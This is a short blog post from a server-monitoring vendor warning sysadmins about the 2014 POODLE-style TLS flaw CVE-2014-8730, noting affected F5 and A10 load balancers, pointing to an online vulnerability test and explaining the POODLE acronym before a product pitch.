Photo By Karin Jonsson (Flickr: Poodle) [CC-BY-2.0 via Wikimedia Commons
POODLE 2.0: Here We Go Again
It was just a bit more than an month ago when the POODLE vulnerability in SSLv3 was discovered and sent sysadmins around the world scrambling.
You might remember that the original POODLE vulernability affected SSLv3, an older protocol that has been largely replaced by the TLS protocol. Since SSLv3 was only available on many systems as a measure to support very old web browsers, it was no big deal to disable it and thereby remove the vulnerabilty.
But today news is spreading that some TLS implementations can be vulnerable too and that as many as 10% of all web sites maybe affected. This new vulnerability has been labeled CVE-2014-8730 and it’s much more serious that the original POODLE.
It’s time to scramble again.
Putting this into real terms it means that when you log into a secure web site a man-in-the-middle could grab your session cookie and use it to have full access to that site.
For sysadmins, this means it is important to patch now in order to protect your corporate sites. Already F5 Networks has reported that some of its load balancers are vulnerable, but a patch is available. Load balancers from A10 Networks are vulnerable too and a patch is expected from them later today. Update: A10 patches can be found here: http://www.a10networks.com/support/security_advisories.php
Monitoring for POODLE 2.0
We’re waiting on details from Microsoft to see if IIS is affected. So far all signs look good. Qualsys has an online test available that will test for many different vulnerabilities including this new one. We tested all of our outward facing Windows boxes and got a passing grade on all of them. We recommend that you do the same as soon as possible.
One Last Thing
Why the name POODLE? Maybe it seems strange to name a serious security issue after a popular dog breed but POODLE is actually an acroymn for “Padding Oracle On Downgraded Legacy Encryption.” In this case “Oracle” has nothing do with the company, but is a term used in cryptography related to attacks that reveal parts of encrypted data in successive steps.
Thanks for Reading!
We develop server monitoring software that helps sysadmins to make sure their criticial IT systems are running 24×7. If you’re looking for a professional monitoring solution, download our free 30-day edition and see for yourself why our monitoring technology is the best that is out there.